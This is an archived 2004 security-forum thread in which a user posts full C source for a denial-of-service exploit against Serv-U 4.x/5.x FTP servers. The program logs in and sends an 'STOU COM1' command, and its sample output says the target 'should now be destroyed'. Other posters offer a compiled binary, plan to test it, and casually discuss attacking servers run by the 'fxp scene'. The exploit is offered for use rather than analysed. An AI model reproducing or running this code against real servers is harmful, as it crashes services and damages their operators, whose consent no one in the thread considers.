hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Public Downloads
agathos
Sep 14 2004, 02:26 AM
Ecko your perl version is good and very good readable smile.gif
mortello your C code is a bit of crap sorry smile.gif but for the first try ok
use the Socket System

here is my C version

CODE

/******************************
* ---------------------------
*      Serv-U 4.x 5.x
*       DOS EXPLOIT
*      by cyrex@EFNet
*
********
* Greetz
* ------
*
*  - Ecko ( For his perl version )
*  - mortello ( for his try to code in C :p)
*  - and all others
*
*
*
* BUG Discovery:
*
*  cyrex@saturn:~$ ./sudos 192.168.1.5 1024 cyrex test
*  ------------------------------------
*  Serv-U 4.x 5.x DOS Exploit
*  by cyrex@EFNet
*  -------------------------------------
*  [+] - Connection to 192.168.1.5
*  220 Serv-U FTP Server v5.1 for WinSock ready...
*  331 User name okay, need password.
*  230 User logged in, proceed.
*  [+] - Connected.. Sending the last command
*  [*] - Target should now be destroyed..
*  cyrex@saturn:~$
*
**************************/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define DEBUG

int fd;

int sendtotarget(char *str) {
int extern fd;
int d; char nc[2048];
sprintf(nc,"%s\r\n",str);
d=send(fd,nc,strlen(nc),0);
if (!d) { printf("[-] Cannot send Data\n"); }
return(0);
}
void help(char *prog)
{
       printf("------------------------------------\n");
       printf(" Serv-U 4.x 5.x DOS Exploit\n");
       printf(" by cyrex@EFNet\n");
       printf("-------------------------------------\n");
printf("Usage: %s <servername> <serverport> [username] [password]\n",prog);
exit(-1);
}
void conn(char *serv,int port,char *user,char *pass)
{
struct hostent *he;
struct sockaddr_in client;
char buffer[513];
char check[1024];
char *pack;
int forked = 0;
int b;
if((he=gethostbyname(serv))==NULL)
{
 exit(-1);
}
if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
 exit(-1);
}
client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);
if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
 printf("[*] - Connection to %s Failed\n",serv);
 exit(-1);
}
sprintf(buffer,"USER %s",user);
sendtotarget(buffer);
sprintf(buffer,"PASS %s",pass);
sendtotarget(buffer);

memset(check,"x00",strlen(check));

recv(fd,check,sizeof(check),0);
#ifdef DEBUG
printf("%s",check);
#endif
if(strstr(check,"530")) {
 printf("[!] - Error Invalid username or Password\n");
 exit(-1);
} else {

printf("[+] - Connected.. Sending the last command\n");
sprintf(buffer,"STOU COM1");
sendtotarget(buffer);
printf("[*] - Target should now be destroyed..\n");
}
}

int main(int argc, char *argv[])
{
int port;
printf("------------------------------------\n");
printf(" Serv-U 4.x 5.x DOS Exploit\n");
printf(" by cyrex@EFNet\n");
printf("-------------------------------------\n");
if((!argv[1]) || (!argv[2]))
{
 help(argv[0]);
 exit(-1);
}
port=atoi(argv[2]);
printf("[+] - Connection to %s\n",argv[1]);
conn(argv[1],port,argv[3],argv[4]);
}






Greets cyrex
mortello
Sep 14 2004, 03:00 AM
Good job....and yeah I know my code was not so good....btw read PM smile.gif
Hellraiseruk
Sep 14 2004, 06:30 AM
what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell blink.gif
Tyrano
Sep 14 2004, 06:51 AM
programming practice biggrin.gif
Paul
Sep 14 2004, 07:24 AM
Its about sharing knowledge..
KuerbY
Sep 14 2004, 10:49 AM
its about: "(filtered) the fxp crap"
we hate them we just only hate them tongue.gif
and the versions are different...
just dont install servu or a trojan write your own "programs" like cyrex etc etc wink.gif
Progressor
Sep 14 2004, 12:33 PM
This is a wrong section. This section called "Files downloads", I don't see any file.
agathos
Sep 14 2004, 01:49 PM
Progessor , dont have a own compiler? ;D and it isnt the wrong Section btw
You can download the Source Code or not ? :=)


here the compiled version of mine

KuerbY
Sep 14 2004, 04:46 PM
i dont want to be an ass but...
i dont like compiled exploit, source or nothing i dont trust anyone then myself tongue.gif
so i think everyone got a good compiler...
rscience
Sep 14 2004, 04:46 PM
grate work dude i will take this and TEST.
Hellraiseruk
Sep 14 2004, 04:59 PM
QUOTE (KuerbY @ Sep 14 2004, 10:49 AM)
its about: "(filtered) the fxp crap"
we hate them we just only hate them tongue.gif
and the versions are different...
just dont install servu or a trojan write your own "programs" like cyrex etc etc wink.gif

u hate them? well the fxp scene gets things on to IRC and p2p networks for u little n00bie kids to download just cuz u don't have axx..some gelously tongue.gif
agathos
Sep 14 2004, 05:40 PM
fxp scene suc ks very very ;D join site scene
cyrixx
Sep 14 2004, 08:51 PM
but not everyone has the chance to join a site...
TRi
Sep 14 2004, 10:04 PM
All these arrogance in this world, its a shame.

You guys fit perfectly to the 17th centuy, looking down on the normal people above from your high and great palaces. Be lucky of yourself and if you enjoy showing off with it, well then thats your business..
Ecko
Sep 24 2004, 10:50 AM
QUOTE (Hellraiseruk @ Sep 14 2004, 06:30 AM)
what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell blink.gif

peoples hard work!? blink.gif you mean fxp pplz whick hacked btw. owned laugh.gif a Server and installed there a ftpd? hm, when that's of hard for u then i don't wanna know whats easy for you tongue.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.